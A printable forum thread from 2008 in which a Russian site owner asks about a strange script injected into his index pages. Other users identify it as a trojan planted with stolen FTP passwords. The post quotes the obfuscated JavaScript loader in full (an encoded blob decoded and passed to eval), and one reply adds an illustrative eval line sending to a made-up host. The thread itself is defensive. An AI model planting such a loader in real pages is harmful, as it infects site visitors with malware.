Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Форум программистов > JavaScript: Общие вопросы > Странный скрипт на страницах моих сайтов!


Автор: jvvseiO6N4uVdFF 19.5.2008, 12:09
У меня хостинг, где размещены много сайтов, недавно на страницах "index.*" заметил странный скрипт, такого никогда лично не внедрял, даже некоторые страницы становится неработоспособными, если появляется дополнительный код, подскажите, пожалуйста, суть существования этого скрипта, что бы смог предпринимать подходящие меры безопасности, понятное дело что внешняя программное обеспечение записывала этот код, а может и нет?

Код между скобками: "<script language=JavaScript>/*function varrban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,61,36,43,5,10,7,46,16,48,0,0,0,0,0,0,19,56,4,39,57,34,35,50,23,9,27,31,45,44,41,62,18,32,59,25,13,28,40,3,52,17,1,0,0,0,0,60,0,6,30,55,49,38,11,21,14,53,12,33,24,29,15,37,54,26,2,58,47,51,8,20,22,42,0);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(240^w&255);w>>=8;s-=2}else{s=6}}}eval®;}}varrban('6eNCwODkbnvkYPlkWp_iXONCgb1GwOD24pSobPVc65leBxIpHuUex5l2mxIXbaSCgpM2gqS28nVQ@pMXlPvkzy_cKKS2BxIdYPDQbRSoBOTkK0_iJcJ2BENcrOSkbPIp1aIklsLQYsIoKpIpS3L94FU9rC1pHfSoxaDiJKLX8KlewPveTf_9IWTegeDolPluZWjG8nvkIGSoTfToShvQUaSE5RDCbxNXhu_cSqNQYpSohKmp')*/</script><!-- logisticsmoldova.com -->"

Автор: Vaulter 19.5.2008, 12:45
ваш сайт взломан
скорее всего по фтп

Автор: IDVsbruck 19.5.2008, 23:52
Однозначно. А числа - коды букв, что-то типа "eval('window.send(\"http://www.fackerssite.ru\")');". Осторожней с ФТП.

Автор: DeamonShan 23.5.2008, 10:08
Такой же случай был, я понял, что был взломан, но это не в ручную внедряют. Я понял это исходя из того, что при изменени прав на файлы (444) файлы  не переписывались...

Автор: z-END 23.5.2008, 10:29
значит дырка в другом месте CMS или в форуме или еще где-нить..

Автор: comtat 23.5.2008, 17:25
Это троян. 
В конец файла добавляется JavaScript код который в невидимом фрейме открывает страничку содержащую троян. 
В основном изменению подвергаются файлы с именами main, login, index и т.п. 
Доступ к фтп вредоносная программа получает путём кражи паролей с компьютера.

следует проверить компьютеры откуда осуществлялись доступы к этим проектам по ftp на наличие троянов и изменить пароли на ftp.

статьи по теме:
http://www.viruslist.com/ru/weblog?weblogid=207758625
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=147349


Автор: jsse 24.5.2008, 16:35
Если хостинг бесплатный, то может они специально добавляют скрипт, допустим чтоб размещать свою рекламу.

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)